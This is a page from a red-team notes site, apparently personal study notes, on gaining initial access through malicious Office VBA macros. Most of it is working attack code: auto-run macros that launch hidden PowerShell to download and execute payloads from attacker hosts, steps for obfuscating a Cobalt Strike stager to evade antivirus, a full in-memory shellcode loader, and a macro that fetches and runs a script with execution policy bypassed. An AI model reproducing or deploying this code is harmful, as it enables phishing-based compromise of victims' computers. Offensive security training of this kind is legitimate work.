🐧
Hassan Saad
  • WHO AM I ?
  • Red Teaming
    • C2 Infrastructure
    • External Reconnaissance
    • Initial Compromise
      • Executable File (EXE)
      • HTML Application (HTA)
      • Visual Basic (VBA Macros)
      • Password Spraying
      • MITM Attack
      • Email Spoofing
    • Host Reconnaissance
      • Seatbelt
      • Screenshots & Keylogging
    • Host Persistence
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM Hijacking
    • Host Privilege Escalation
      • Automated Tools
      • Unquoted Service Path
      • Weak Service Permission
      • Weak Service Binary
      • Always Install Elevated
      • UAC Bypass
    • Domain Reconnaissance
      • PowerView
      • BloodHound
      • Linux Host
      • Internal Applications
    • Lateral Movement
      • PowerShell Remoting
      • PsExec
      • WMI
      • DCOM
    • Credentials Access
      • LogonPasswords
      • Security Account Manager (SAM)
      • Domain Cached Creds
      • Kerberos Tickets
      • DPAPI
      • User Impersonation
      • Pass The Hash
      • Over Pass The Hash
      • Internal Password Spraying
      • Sniffing
      • NTLM Relay
    • Pivoting & Forwarding
      • SOCKS Proxy
      • Reverse Port Forwards
      • Local Port Forwards
      • Session Passing
      • P2P Listeners
      • NTLM Relay
    • Kerberos
      • Authentication
      • Kerberoasting
      • ASREP-Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Linux Credential Cache
    • Group Policy
      • Enumeration
      • RSAT (GPMC)
      • Sharp GPO Abuse
    • Access Control Lists (DACL)
      • GenericAll
      • WriteDacl
      • WriteOwner
    • MS SQL Servers
      • Enumeration
      • NetNTLM Capture
      • Command Execution
      • Lateral Movement
      • Privilege Escalation
    • Domain Dominance
      • DCSync Backdoor
      • AdminSDHolder
      • Remote Registry Backdoor
      • Skeleton Key
      • Silver Ticket
      • Golden Ticket
    • Forest & Domain Trusts
      • Parent/Child
      • One Way (Inbound)
      • One Way (Outbound)
    • Evasion Techniques
      • Obfuscation
      • Process Injection
      • LAPS
      • AppLocker
      • PowerShell Constrained Mode
      • AMSI
      • Antivirus Exclusion
  • Penetration Testing
    • Information Gathering
    • Scanning
    • Exploitation
    • Post Exploitation
    • Password Attacks
    • Web Attacks
    • Exploit Development
  • Technology Essentials
    • Linux
      • Basics
      • Tasks
    • Windows
      • Basics
      • Tasks
    • Network
      • Basics
      • Tasks
    • Programming
      • Basics
      • Tasks
  • Bug Hunting
    • XSS on Nokia
    • XSS on Wuzzuf
    • Business Logic Flaw on Souq (Amazon Company)
    • Rate Limit Bypass on LinkedIn
    • Sensitive Data Exposure on Google
  • Tools
    • Recon Hunter
    • Mail Hunter
    • Mobile Hunter
    • Chimera (Threat Hunter)
  • Extras
    • SQL Injection
    • Web Basics
    • Mobile Testing
      • Mobile Testing 1
      • Mobile Testing 2
      • Mobile Testing 3
Powered by GitBook
On this page
  • Simple Scenario
  • Advanced Scenario
  1. Red Teaming
  2. Initial Compromise

Visual Basic (VBA Macros)

PreviousHTML Application (HTA)NextPassword Spraying

Last updated 2 years ago

Simple Scenario

Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub
Sub AutoOpen()
  Dim proc As Object
  Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
  proc.Create "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub

Advanced Scenario

Attack Diagram

Listener & Payload

  • Generate cobalt strike 32bit PowerShell payload.

  • Run the following script on it:

# Functions
sed -i "s/func_get_proc_address/tryfun0/g" payload.ps1
sed -i "s/func_get_delegate_type/tryfun1/g" payload.ps1


# Variables
sed -i "s/\$var_module/\$tryvar0/g" payload.ps1
sed -i "s/\$var_procedure/\$tryvar1/g" payload.ps1
sed -i "s/\$var_unsafe_native_methods/\$tryvar2/g" payload.ps1
sed -i "s/\$var_gpa/\$tryvar3/g" payload.ps1
sed -i "s/\$var_parameters/\$tryvar4/g" payload.ps1
sed -i "s/\$var_type_builder/\$tryvar5/g" payload.ps1
sed -i "s/\$var_return_type/\$tryvar6/g" payload.ps1
sed -i "s/\$var_code/\$tryvar7/g" payload.ps1
sed -i "s/\$x/\$tryvar8/g" payload.ps1
sed -i "s/\$var_va/\$tryvar9/g" payload.ps1
sed -i "s/\$var_buffer/\$tryvar10/g" payload.ps1
sed -i "s/\$var_runme/\$tryvar11/g" payload.ps1

# Other
sed -i "s/\$DoIt/\$tryvar12/g" payload.ps1
sed -i "s/\$a/\$tryvar13/g" payload.ps1
sed -i "s/, 0,/, 0x0,/g" payload.ps1
sed -i "s/= 0;/= 0x0;/g" payload.ps1

  • Obfuscate the internal base64 payload with the Invoke Obfuscation tool:

git clone https://github.com/danielbohannon/Invoke-Obfuscation
pwsh
> Import-Module ./Invoke-Obfuscation/Invoke-Obfuscation.psd1
> Invoke-Obfuscation
> set ScriptBlock "Payload"
> compress
> 1
> copy

  • The full PowerShell code:

Set-StrictMode -Version 2

$tryvar12 = @'
function tryfun0 {
	Param ($tryvar0, $tryvar1)		
	$tryvar2 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$tryvar3 = $tryvar2.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $tryvar3.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($tryvar2.GetMethod('GetModuleHandle')).Invoke($null, @($tryvar0)))), $tryvar1))
}

function tryfun1 {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tryvar4,
		[Parameter(Position = 1)] [Type] $tryvar6 = [Void]
	)

	$tryvar5 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$tryvar5.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $tryvar4).SetImplementationFlags('Runtime, Managed')
	$tryvar5.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tryvar6, $tryvar4).SetImplementationFlags('Runtime, Managed')

	return $tryvar5.CreateType()
}

# Here
$new_me = (NEw-OBject  io.COMprEssIoN.DEfLAteStREAm([iO.MeMORYStReaM][cONVERT]::frombaSe64sTRiNG('LVLJFqo6EPwgFzKJuLgLhgBhiJIAAjsZVHBgVAhff+O7b1EnOd1Vdbr7lKh8ekj9JpAHC3xNu7dByPBlEHsTeJ6DOw17BfgcTzbnXGGgGNJn/sBPqHGiyTHe2lvgCr/HNuU/L4kvO/hFrDbue3s04NdQbaFvTflWH/73+acP8pnPE2juc8uU7Hg0f3wbfjWz1w8t+2/hV28dplPk7q3NpVQBR64Sr5jFSakut4W68YZwvBVT5MWgQ+RdejkfmA5aBTAtXGljrgRjVsY9EE+527E9oXgj8tuhhGi0eEzrb/fCRl7p9squXAVqIondYSHUv6dyuRSJORcJ8qidIov59p/zTbJ9IjJvUi5zGY1HJ5xS8XR5SZS+JR02cPGKbooTRx4uVO+8usq16/TTOl52cw5g+jcfIZiWzPtph4bLvN+677N5LjuzihjHHWvmpQw9rP2Gyk0hotknj52OQRqAgAfkETX7xyQfz+UjyQO/DmikcEX2Om7EpLvRR+e8t833WbyPG7ozthTbHaXp/qNfn6eNFu6onFvL07hXZfjCh3rsQukh14Z2XDkoZgF+gmP6wFYYF5kq7Pxz1J1CDvrmjQvVeeLIg7dDEweqwIvqAkMD+6kqYjfEUWKpKDdxkaq8GVt4vLCeqwrYCsDdNzQQsucHogqxG0WZGZqjby0tAlTq4Hbeft+zRKwYNZZDqeSarzuSk/N2NOp77e8MY9i3YjoqoLfdSPEgBrJB53a1th8lwG01COhp9KfsSdXZ1fPq5HdBrC0+vJ+WtdpG5aW8KrNOswNRB9f7ImQmlVdnk3RbDHlwwPZh2c+XUwTvEdocvj+w0d8lgT8cXsFZe2VKAfQzCBRh3KR8iDUcE+Tuh73/5BcvXab2yO5EkrCtLKUqry0ky0ldw435ncK0jjJjFpHz9JRhU1wCmo+ITBfYjFoJRT1fP2qrdvopGhpJdtOXMJzgpgEDQR63u2glyyk5Iw+uLM/c2EDBb0ow7e+iYbEczq8bq1G/3ryduR9ZTqlvQIp+WV2my6D9l1X++uz1oJbcvInHbC/5H1ec1gLcW2xgGFszl4OZIwCPjY9L/jz/+fMX') , [SYStEM.Io.COmpRESsioN.CompresSIOnmodE]::DECOmPrEsS) | % {NEw-OBject  syStEm.io.StReAMREaDer( $_,[TExT.eNcoDIng]::ASCiI )}| %{ $_.reaDToenD( ) } )

[Byte[]]$tryvar7 = [System.Convert]::FromBase64String($new_me)

for ($tryvar8 = 0x0; $tryvar8 -lt $tryvar7.Count; $tryvar8++) {
	$tryvar7[$tryvar8] = $tryvar7[$tryvar8] -bxor 35
}

$tryvar9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((tryfun0 kernel32.dll VirtualAlloc), (tryfun1 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$tryvar10 = $tryvar9.Invoke([IntPtr]::Zero, $tryvar7.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($tryvar7, 0x0, $tryvar10, $tryvar7.length)

$tryvar11 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tryvar10, (tryfun1 @([IntPtr]) ([Void])))
$tryvar11.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($tryvar13) IEX $tryvar13 } -RunAs32 -Argument $tryvar12 | wait-job | Receive-Job
}
else {
	IEX $tryvar12
}

  • Encode it with Base64 encoding.

cat payload.ps1.new | base64 -w 0

  • Host the encoded string on your own web server.

python -m SimpleHTTPServer

Macro Code (VB)

Sub Auto_Open()
 DownloadFileFromURL
End Sub

Sub Document_Open()
 DownloadFileFromURL
End Sub

Sub DownloadFileFromURL()

Dim FileUrl As String
Dim objXmlHttpReq As Object
Dim objStream As Object

FileUrl = "http://192.168.80.128:8000/payload.ps1.new"

Set objXmlHttpReq = CreateObject("Microsoft.XMLHTTP")

objXmlHttpReq.Open "GET", FileUrl, False, "username", "password"
objXmlHttpReq.send

If objXmlHttpReq.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")

ChDir ActiveWorkbook.Path

objStream.Open
objStream.Type = 1
objStream.Write objXmlHttpReq.responseBody
objStream.SaveToFile CurDir() & "\bla4.ps1", 2
objStream.Close

End If

Shell ("c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -W Hidden .\bla4.ps1")

End Sub